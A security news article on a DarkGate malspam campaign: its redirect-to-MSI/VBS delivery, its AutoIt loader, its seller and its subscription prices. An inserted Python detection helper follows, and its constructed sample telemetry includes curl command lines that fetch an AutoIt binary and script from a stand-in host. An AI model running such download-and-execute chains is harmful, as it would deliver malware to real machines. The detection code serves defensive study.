A malspam campaign launches the DarkGate malware

September 13, 2023

A malspam campaign has driven a surge in DarkGate malware activity across the cybercriminal landscape. Based on reports, the sudden increase in usage is likely the result of the malware's developers renting it out to affiliates.

The attack begins with a phishing URL that, once a user accesses it, routes the visitor through a traffic direction system (TDS), which forwards them to an MSI payload only when certain conditions are met. The campaign also sets a Refresh header in the HTTP response to trigger the redirect.

Once the targeted user opens the MSI file, the campaign triggers a multi-stage process in which an AutoIt script runs shellcode that serves as a conduit to decrypt and deploy DarkGate through a loader.

The researchers explained that the loader parses the AutoIt script and extracts the encrypted malware sample. An alternative variant of the attack uses a Visual Basic Script (VBS) instead of an MSI file; in that case, cURL retrieves the AutoIt executable and script files. However, researchers have yet to identify the exact delivery method of the VBS.
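The delivery chain described in the preceding paragraphs leaves two observable traces that a defender can hunt for: an HTTP response whose Refresh header points at an installer or script file, and a script host (the VBS variant) whose child processes run cURL and then launch an AutoIt interpreter. The following Python is an added illustration, not code from the article or from any vendor research; the field names, the `HTTP_SAMPLES` and `PROCESS_SAMPLES` records, and the domains in them are all constructed for this example.

```python
"""Detection helpers for the DarkGate delivery chain (added illustration).

Two checks a defender could run over web-proxy and endpoint telemetry:
  1. refresh_to_payload(): an HTTP response that uses a Refresh header to
     send the browser to an .msi or .vbs file.
  2. autoit_chains(): a script host (wscript/cscript) whose process tree
     both runs curl.exe and launches an AutoIt interpreter.
All record layouts and sample values below are constructed for this example.
"""
import re
from urllib.parse import urlparse

# File types the reported chain delivers (constructed list for this example).
PAYLOAD_EXTENSIONS = (".msi", ".vbs")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

# Refresh header grammar: "<seconds>" or "<seconds>; url=<target>".
_REFRESH_RE = re.compile(r"^\s*(\d+)\s*(?:;\s*url\s*=\s*(.+?)\s*)?$", re.IGNORECASE)


def parse_refresh_header(value):
    """Return (delay_seconds, target_url_or_None), or None if the header is malformed."""
    m = _REFRESH_RE.match(value)
    if not m:
        return None
    delay, url = int(m.group(1)), m.group(2)
    if url and len(url) >= 2 and url[0] in "'\"" and url[-1] == url[0]:
        url = url[1:-1]  # strip optional quotes around the URL
    return delay, url


def refresh_to_payload(response):
    """True when a response's Refresh header redirects to an installer/script file."""
    value = response.get("headers", {}).get("Refresh")
    if value is None:
        return False
    parsed = parse_refresh_header(value)
    if parsed is None or parsed[1] is None:
        return False
    return urlparse(parsed[1]).path.lower().endswith(PAYLOAD_EXTENSIONS)


def _basename(image):
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def autoit_chains(events):
    """Return pids of script-host processes whose descendants run curl and an AutoIt interpreter.

    Note: matching the interpreter by image name is a weak signal (the binary can
    be renamed); in production, add signer or hash checks on the launched image.
    """
    by_pid = {e["pid"]: e for e in events}

    def root_script_host(e):
        seen = set()
        while e is not None and e["pid"] not in seen:
            seen.add(e["pid"])
            if _basename(e["image"]) in SCRIPT_HOSTS:
                return e["pid"]
            e = by_pid.get(e["ppid"])
        return None

    curl_roots, autoit_roots = set(), set()
    for e in events:
        root = root_script_host(e)
        if root is None:
            continue
        name = _basename(e["image"])
        if name == "curl.exe":
            curl_roots.add(root)
        elif name.startswith("autoit3"):
            autoit_roots.add(root)
    return sorted(curl_roots & autoit_roots)


# Constructed sample telemetry (not real campaign data).
HTTP_SAMPLES = [
    {"url": "http://tds.example/landing", "headers": {"Refresh": "0; url=http://cdn.example/setup.msi"}},
    {"url": "http://news.example/", "headers": {"Refresh": "30"}},
    {"url": "http://shop.example/", "headers": {"Refresh": "5; url=/page2.html"}},
]
PROCESS_SAMPLES = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmdline": "wscript.exe invoice.vbs"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe -o AutoIt3.exe http://cdn.example/a.exe"},
    {"pid": 301, "ppid": 200, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe -o script.au3 http://cdn.example/s.au3"},
    {"pid": 400, "ppid": 200, "image": r"C:\Users\Public\AutoIt3.exe", "cmdline": "AutoIt3.exe script.au3"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe https://example.org"},
]


def run_samples():
    """Apply both checks to the constructed samples; returns (flagged URLs, flagged root pids)."""
    flagged_urls = [r["url"] for r in HTTP_SAMPLES if refresh_to_payload(r)]
    return flagged_urls, autoit_chains(PROCESS_SAMPLES)


if __name__ == "__main__":
    print(run_samples())  # prints (['http://tds.example/landing'], [200])
```

The process check deliberately requires both behaviours under the same script-host root so that a lone curl.exe launched from a shell (pid 500 above) is not flagged; tune `SCRIPT_HOSTS` and the interpreter match to the telemetry you actually collect.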

A single threat actor distributes the DarkGate malware in the threat landscape.

According to investigations, a threat actor known as RastaFarEye sells the DarkGate malware, primarily on underground forums. The malware offers a range of capabilities, including bypassing security software, establishing persistence, escalating privileges, and stealing data from web browsers and other software, such as FileZilla and Discord.

Additionally, it can connect to a command-and-control server for data exfiltration, deploy cryptominers, enumerate files, capture screenshots remotely, and run other commands.

RastaFarEye offers the malware at $1,000 per day for a one-day subscription, $15,000 per month, and $100,000 per year. Its developers advertise the product as the ultimate tool for pen-testers, with features not found in other tools. Finally, one of the earliest versions of DarkGate shipped with a ransomware module.

Malware strains like DarkGate still propagate and reach their targets through phishing. Experts advise everyone to be vigilant when opening attachments in unwanted emails and unsolicited communications.
